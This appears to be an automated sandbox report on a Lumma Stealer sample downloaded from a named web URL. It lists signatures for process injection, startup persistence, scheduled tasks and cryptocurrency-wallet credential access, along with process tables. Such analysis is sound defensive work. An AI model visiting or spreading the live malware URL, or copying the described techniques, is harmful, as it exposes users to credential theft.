Malware Analysis Report

2024-11-30 05:32

Sample ID 240709-lp9jgazdrg
Target https://instantinfo.shop/webdav/jreg/CONT
Tags
lumma spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://instantinfo.shop/webdav/jreg/CONT was found to be: Known bad.

Malicious Activity Summary

lumma spyware stealer

Lumma Stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Drops startup file

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Enumerates processes with tasklist

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 09:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 09:43

Reported

2024-07-09 09:47

Platform

win10v2004-20240704-en

Max time kernel

200s

Max time network

203s

Command Line

C:\Windows\Explorer.EXE

Signatures

Lumma Stealer

stealer lumma

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4728 created 3580 N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif C:\Windows\Explorer.EXE
PID 4728 created 3580 N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif C:\Windows\Explorer.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url C:\Windows\SysWOW64\cmd.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1936 set thread context of 3000 N/A C:\ProgramData\1ASPX.exe C:\Windows\SysWOW64\more.com
PID 1908 set thread context of 4880 N/A C:\ProgramData\1ASPX.exe C:\Windows\SysWOW64\more.com

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\SearchIndexer.exe N/A
N/A N/A C:\Windows\SysWOW64\SearchIndexer.exe N/A
N/A N/A C:\Windows\SysWOW64\SearchIndexer.exe N/A
N/A N/A C:\Windows\SysWOW64\SearchIndexer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2700 wrote to memory of 2528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3848 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 3108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://instantinfo.shop/webdav/jreg/CONT

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa428c46f8,0x7ffa428c4708,0x7ffa428c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8

